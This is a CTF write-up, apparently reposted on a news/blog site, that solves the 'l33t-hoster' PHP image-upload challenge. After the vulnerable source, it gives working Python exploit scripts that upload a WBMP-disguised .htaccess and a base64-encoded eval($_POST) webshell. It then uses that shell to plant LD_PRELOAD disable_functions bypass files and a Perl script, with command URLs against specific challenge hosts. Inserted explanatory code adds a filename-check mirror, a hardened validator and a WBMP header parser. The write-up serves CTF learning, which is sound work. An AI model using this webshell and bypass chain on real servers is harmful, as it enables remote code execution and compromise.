news 2026/6/17 19:30:12

l33t-hoster

张小明, front-end development engineer

I have been working on this challenge for two days.

I gave it everything and got stuck at the very last step, so I decided to set it aside for now. I suspect the platform's flag is broken (a previous challenge also had an empty flag).

Tomorrow I will summarize the knowledge points; for now I am recording the solving process. I read a lot of write-ups by more experienced players.

First, look at the source: /?source shows the page source, and there is the filtering code:
<?php
if (isset($_GET["source"]))
    die(highlight_file(__FILE__));

session_start();

if (!isset($_SESSION["home"])) {
    $_SESSION["home"] = bin2hex(random_bytes(20));
}
$userdir = "images/{$_SESSION["home"]}/";
if (!file_exists($userdir)) {
    mkdir($userdir);
}

$disallowed_ext = array(
    "php",
    "php3",
    "php4",
    "php5",
    "php7",
    "pht",
    "phtm",
    "phtml",
    "phar",
    "phps",
);


if (isset($_POST["upload"])) {
    if ($_FILES['image']['error'] !== UPLOAD_ERR_OK) {
        die("yuuuge fail");
    }

    $tmp_name = $_FILES["image"]["tmp_name"];
    $name = $_FILES["image"]["name"];
    $parts = explode(".", $name);
    $ext = array_pop($parts);

    if (empty($parts[0])) {
        array_shift($parts);
    }

    if (count($parts) === 0) {
        die("lol filename is empty");
    }

    if (in_array($ext, $disallowed_ext, TRUE)) {
        die("lol nice try, but im not stupid dude...");
    }

    $image = file_get_contents($tmp_name);
    if (mb_strpos($image, "<?") !== FALSE) {
        die("why would you need php in a pic.....");
    }

    if (!exif_imagetype($tmp_name)) {
        die("not an image.");
    }

    $image_size = getimagesize($tmp_name);
    if ($image_size[0] !== 1337 || $image_size[1] !== 1337) {
        die("lol noob, your pic is not l33t enough");
    }

    $name = implode(".", $parts);
    move_uploaded_file($tmp_name, $userdir . $name . "." . $ext);
}

echo "<h3>Your <a href=$userdir>files</a>:</h3><ul>";
foreach(glob($userdir . "*") as $file) {
    echo "<li><a href='$file'>$file</a></li>";
}
echo "</ul>";

?>
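The filename handling above is the weak point: after the extension is popped, one leading empty component is dropped, so a name like "..htaccess" is stored as ".htaccess", and "htaccess" is not on the extension denylist. This added example (not part of the challenge or the original post) mirrors that PHP logic in Python so the behaviour can be checked offline, and places a stricter variant beside it; the allow-list of image extensions in the hardened version is an assumption of this example.

```python
import re

# Extension denylist copied from the challenge source.
DISALLOWED_EXT = {"php", "php3", "php4", "php5", "php7",
                  "pht", "phtm", "phtml", "phar", "phps"}

# Allow-list used by the hardened variant (assumption of this example).
ALLOWED_IMAGE_EXT = {"jpg", "jpeg", "png", "gif"}


def stored_name(name: str):
    """Mirror of the challenge's explode / array_pop / array_shift / implode
    logic. Returns the file name the upload would be saved under, or None
    where the PHP script calls die()."""
    parts = name.split(".")           # explode(".", $name)
    ext = parts.pop()                 # array_pop($parts)
    # empty($parts[0]) is true for "", "0" and a missing element; one
    # leading empty component is then removed by array_shift().
    if parts and parts[0] in ("", "0"):
        parts.pop(0)
    if len(parts) == 0:
        return None                   # "lol filename is empty"
    if ext in DISALLOWED_EXT:         # case-sensitive comparison
        return None                   # "lol nice try..."
    return ".".join(parts) + "." + ext


def hardened_name(name: str):
    """Stricter check (added here, not from the challenge): exactly one dot,
    a non-empty base name of safe characters, and an extension taken from an
    allow-list instead of a denylist, compared case-insensitively."""
    base, dot, ext = name.rpartition(".")
    if not dot or not re.fullmatch(r"[A-Za-z0-9_-]{1,64}", base):
        return None                   # rejects ".htaccess", "..htaccess", "a.b.c"
    ext = ext.lower()
    if ext not in ALLOWED_IMAGE_EXT:
        return None
    return base + "." + ext
```

A stricter name check alone is not enough: the upload directory must also be served with AllowOverride None and no script handler, otherwise a stored .htaccess or a renamed file can still be turned into executable content.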

The filter really is strict: the PHP extensions are almost all blocked, so I thought of .htaccess, but there were so many requirements that I had no idea how to proceed, and I went to read the write-ups:

https://blog.csdn.net/Uchiha_duan/article/details/131706725
https://blog.csdn.net/mochu7777777/article/details/113772879?ops_request_misc=elastic_search_misc&request_id=0a7ed329acd0355e5f9fe1bd6843d728&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~ElasticSearch~search_v2-1-113772879-null-null.nonecase&utm_term=l33t-hoster&spm=1018.2226.3001.4450

#!/usr/bin/env python3
import requests
import base64

# WBMP header: type 0, no extension header, width and height 1337
VALID_WBMP = b"\x00\x00\x8a\x39\x8a\x39\x0a"
URL = "https://b2a6ae701e7208e05ae1ba94.http-ctf2.dasctf.com/"
RANDOM_DIRECTORY = "d54b886eaf53b0e1039f26d24b393565669b6816"
COOKIES = {"PHPSESSID": "m43d1fip3edjosh48kpjnqj0b2"}


def upload_content(name, content):
    data = {
        "image": (name, content, 'image/png'),
        "upload": (None, "Submit Query", None)
    }
    response = requests.post(URL, files=data, cookies=COOKIES)


HT_ACCESS = VALID_WBMP + b"""
AddType application/x-httpd-php .jpg
php_value auto_append_file "php://filter/convert.base64-decode/resource=mochu7.jpg"
"""

TARGET_FILE = VALID_WBMP + b"AA" + base64.b64encode(b"""
<?php echo "shell ok!"; eval($_POST['mochu7']); ?>
""")

upload_content("..htaccess", HT_ACCESS)
upload_content("mochu7.jpg", TARGET_FILE)

response = requests.post(URL + "/images/" + RANDOM_DIRECTORY + "/mochu7.jpg")
print(response.text)
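The script above relies on two properties of the 7-byte WBMP header: PHP's image reader parses only type, a fixed header byte and two multi-byte integers (7 data bits per byte, MSB set on every byte but the last) and never looks at pixel data, so 0x8a 0x39 encodes 1337 and anything may follow; and only two of the header bytes ('9', 0x39) are base64-alphabet characters, which is why "AA" is needed to keep the payload 4-aligned for the convert.base64-decode filter. This added example (not code from the original post or from mochu7) decodes that header and computes the padding; the 2048 dimension limit reflects PHP's php_get_wbmp() check.

```python
import string

# Constructed from the header used in the post: WBMP type 0, fixheader 0,
# width 1337, height 1337, followed by one data byte.
VALID_WBMP = b"\x00\x00\x8a\x39\x8a\x39\x0a"

_B64_ALPHABET = set((string.ascii_letters + string.digits + "+/").encode())


def read_mbi(data: bytes, pos: int):
    """Read one WBMP multi-byte integer starting at pos.
    Returns (value, position after the last byte)."""
    value = 0
    while True:
        if pos >= len(data):
            raise ValueError("truncated multi-byte integer")
        byte = data[pos]
        pos += 1
        value = (value << 7) | (byte & 0x7F)
        if not byte & 0x80:           # MSB clear: last byte of the integer
            return value, pos


def parse_wbmp_header(data: bytes):
    """Return (width, height) of a type-0 WBMP header, or None where PHP's
    reader (ext/standard/image.c, php_get_wbmp) rejects it: non-zero type,
    truncated header, or a zero / greater-than-2048 dimension. Pixel data is
    never validated, so arbitrary text may follow the six header bytes."""
    try:
        wbmp_type, pos = read_mbi(data, 0)
        if wbmp_type != 0:
            return None
        _fixheader, pos = read_mbi(data, pos)   # 0x00: no extension headers
        width, pos = read_mbi(data, pos)
        height, pos = read_mbi(data, pos)
    except ValueError:
        return None
    if not (0 < width <= 2048 and 0 < height <= 2048):
        return None
    return width, height


def base64_prefix_padding(prefix: bytes) -> int:
    """Number of filler 'A' bytes needed after prefix so that the base64
    alphabet bytes it contains (the only ones PHP's non-strict
    convert.base64-decode filter keeps) total a multiple of 4."""
    kept = sum(1 for b in prefix if b in _B64_ALPHABET)
    return (-kept) % 4
```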

I started with mochu7's (末初) blog post
and learned how to get a shell. I was working on ctf2 (formerly buuctf),
and I also ran into the problem that mochu7=var_dump(file_get_contents('/flag')); returns bool(false).
By reading
https://blog.csdn.net/Uchiha_duan/article/details/131706725
https://github.com/mdsnins/ctf-writeups/blob/master/2019/Insomnihack%202019/l33t-hoster/l33t-hoster.md
I learned about LD_PRELOAD injection.

import requests
import base64

URL = "https://b2a6ae701e7208e05ae1ba94.http-ctf2.dasctf.com/"
RANDOM_DIRECTORY = "d54b886eaf53b0e1039f26d24b393565669b6816"
url = URL + "/images/" + RANDOM_DIRECTORY + "/mochu7.jpg"

# PHP run through the webshell: move the multipart file into the session
# directory, then list the directory to confirm
param = {"mochu7": "move_uploaded_file($_FILES['file']['tmp_name'],'/var/www/html/images/d54b886eaf53b0e1039f26d24b393565669b6816/bypass_disablefunc.php');echo 'ok';var_dump(scandir('/var/www/html/images/d54b886eaf53b0e1039f26d24b393565669b6816'));"}
files = [('file', ('bypass_disablefunc.php', open("bypass_disablefunc.php", "rb"), 'application/octet-stream'))]
r = requests.post(url=url, files=files, data=param)
print(r.text)

import requests

URL = "https://b2a6ae701e7208e05ae1ba94.http-ctf2.dasctf.com/"
RANDOM_DIRECTORY = "d54b886eaf53b0e1039f26d24b393565669b6816"
url = URL + "/images/" + RANDOM_DIRECTORY + "/mochu7.jpg"

# Same upload trick for the shared object
param = {"mochu7": "move_uploaded_file($_FILES['file']['tmp_name'],'/var/www/html/images/d54b886eaf53b0e1039f26d24b393565669b6816/bypass_disablefunc_x64.so');echo 'ok';var_dump(scandir('/var/www/html/images/d54b886eaf53b0e1039f26d24b393565669b6816'));"}
files = [('file', ('bypass_disablefunc_x64.so', open("bypass_disablefunc_x64.so", "rb"), 'application/octet-stream'))]
r = requests.post(url=url, files=files, data=param)
print(r.text)

/bypass_disablefunc.php?cmd=ls /&outpath=/tmp/xx&sopath=/var/www/html/images/9955ee8e10455eaeaf6680356a60645003eda6f8/bypass_disablefunc_x64.so
https://274fcdc69af496cb834ecac5.http-ctf2.dasctf.com/images/9955ee8e10455eaeaf6680356a60645003eda6f8/bypass_disablefunc.php?cmd=ls%20/&outpath=/tmp/xx&sopath=/var/www/html/images/9955ee8e10455eaeaf6680356a60645003eda6f8/bypass_disablefunc_x64.so

Then upload the official .pl file:
/images/9955ee8e10455eaeaf6680356a60645003eda6f8/bypass_disablefunc.php?cmd=perl fuck.pl&outpath=/tmp/xx&sopath=/var/www/html/images/9955ee8e10455eaeaf6680356a60645003eda6f8/bypass_disablefunc_x64.so

import requests
import base64

URL = "https://b2a6ae701e7208e05ae1ba94.http-ctf2.dasctf.com/"
RANDOM_DIRECTORY = "d54b886eaf53b0e1039f26d24b393565669b6816"
url = URL + "/images/" + RANDOM_DIRECTORY + "/mochu7.jpg"

# Same upload trick for the Perl script
param = {"mochu7": "move_uploaded_file($_FILES['file']['tmp_name'],'/var/www/html/images/d54b886eaf53b0e1039f26d24b393565669b6816/fuck.pl');echo 'ok';var_dump(scandir('/var/www/html/images/d54b886eaf53b0e1039f26d24b393565669b6816'));"}
files = [('file', ('fuck.pl', open("fuck.pl", "rb"), 'application/octet-stream'))]
r = requests.post(url=url, files=files, data=param)
print(r.text)
